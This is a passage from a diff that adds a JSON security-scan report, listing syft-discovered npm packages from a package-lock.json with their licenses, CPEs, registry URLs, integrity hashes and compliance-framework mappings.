], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.includes:lodash.includes:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.includes@4.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz", + "integrity": "sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c512306c360b6fda", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.isarguments 3.1.0", + "title": "lodash.isarguments 3.1.0", + "description": "Package discovered: lodash.isarguments 3.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c84bded77fb6b828", + "name": "lodash.isarguments", + "version": "3.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.isarguments:lodash.isarguments:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.isarguments@3.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.isarguments/-/lodash.isarguments-3.1.0.tgz", + "integrity": "sha512-chi4NHZlZqZD18a0imDHnZPrDeBbTtVN7GXMwuGdRH9qotxAjYs3aVLKc7zNOG9eddR5Ksd8rvFEBc9SsggPpg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f0317f2d62f56421", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.isboolean 3.0.3", + "title": "lodash.isboolean 3.0.3", + "description": "Package discovered: lodash.isboolean 3.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "df154b64f7d4588a", + "name": "lodash.isboolean", + "version": "3.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.isboolean:lodash.isboolean:3.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.isboolean@3.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz", + "integrity": "sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2ae1d391a80c5a72", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.isinteger 4.0.4", + "title": "lodash.isinteger 4.0.4", + "description": "Package discovered: lodash.isinteger 4.0.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e92c8ae8d8c83e78", + "name": "lodash.isinteger", + "version": "4.0.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.isinteger:lodash.isinteger:4.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.isinteger@4.0.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz", + "integrity": "sha512-DBwtEWN2caHQ9/imiNeEA5ys1JoRtRfY3d7V9wkqtbycnAmTvRRmbHKDV4a0EYc678/dia0jrte4tjYwVBaZUA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0e12d10e43707e74", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.isnumber 3.0.3", + "title": "lodash.isnumber 3.0.3", + "description": "Package discovered: lodash.isnumber 3.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "32689628126e866e", + "name": "lodash.isnumber", + "version": "3.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.isnumber:lodash.isnumber:3.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.isnumber@3.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz", + "integrity": "sha512-QYqzpfwO3/CWf3XP+Z+tkQsfaLL/EnUlXWVkIk5FUPc4sBdTehEqZONuyRt2P67PXAk+NXmTBcc97zw9t1FQrw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f1231b7e60dd673c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.isplainobject 4.0.6", + "title": "lodash.isplainobject 4.0.6", + "description": "Package discovered: lodash.isplainobject 4.0.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a6b14f73240e0d01", + "name": "lodash.isplainobject", + "version": "4.0.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.isplainobject:lodash.isplainobject:4.0.6:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.isplainobject@4.0.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz", + "integrity": "sha512-oSXzaWypCMHkPC3NvBEaPHf0KsA5mvPrOPgQWDsbg8n7orZ290M0BmC/jgRZ4vcJ6DTAhjrsSYgdsW/F+MFOBA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1ec5aad22a5b316a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.isstring 4.0.1", + "title": "lodash.isstring 4.0.1", + "description": "Package discovered: lodash.isstring 4.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f161741909d3d58f", + "name": "lodash.isstring", + "version": "4.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.isstring:lodash.isstring:4.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.isstring@4.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz", + "integrity": "sha512-0wJxfxH1wgO3GrbuP+dTTk7op+6L41QCXbGINEmD+ny/G/eCqGzxyCsh7159S+mgDDcoarnBw6PC1PS5+wUGgw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7962026049b4f49e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.once 4.1.1", + "title": "lodash.once 4.1.1", + "description": "Package discovered: lodash.once 4.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f5ead8ead936acd7", + "name": "lodash.once", + "version": "4.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.once:lodash.once:4.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.once@4.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz", + "integrity": "sha512-Sb487aTOCr9drQVL8pIxOzVhafOjZN9UU54hiN8PU3uAiSV7lx1yYNpbNmex2PK6dSJoNTSJUUswT651yww3Mg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "cf9c5c396fa8379f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: long 5.3.2", + "title": "long 5.3.2", + "description": "Package discovered: long 5.3.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "22165934193ce3c8", + "name": "long", + "version": "5.3.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:long:long:5.3.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/long@5.3.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/long/-/long-5.3.2.tgz", + "integrity": "sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4615c5000eb45f3d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: loose-envify 1.4.0", + "title": "loose-envify 1.4.0", + "description": "Package discovered: loose-envify 1.4.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "01ac139389c8bf08", + "name": "loose-envify", + "version": "1.4.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:loose-envify:loose-envify:1.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:loose-envify:loose_envify:1.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:loose_envify:loose-envify:1.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:loose_envify:loose_envify:1.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:loose:loose-envify:1.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:loose:loose_envify:1.4.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/loose-envify@1.4.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz", + "integrity": "sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==", + "dependencies": { + "js-tokens": "^3.0.0 || ^4.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + 